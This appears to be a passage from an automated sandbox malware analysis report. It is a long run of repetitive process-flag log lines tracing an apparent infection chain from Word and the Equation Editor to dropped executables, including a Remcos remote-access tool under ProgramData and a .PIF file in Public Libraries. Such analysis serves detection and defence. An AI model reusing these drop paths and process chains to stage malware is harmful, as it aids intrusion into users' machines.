                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\hjc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\ProgramData\Remcos\remcos.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                        Source: C:\Users\Public\Libraries\Rdxcjsng.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
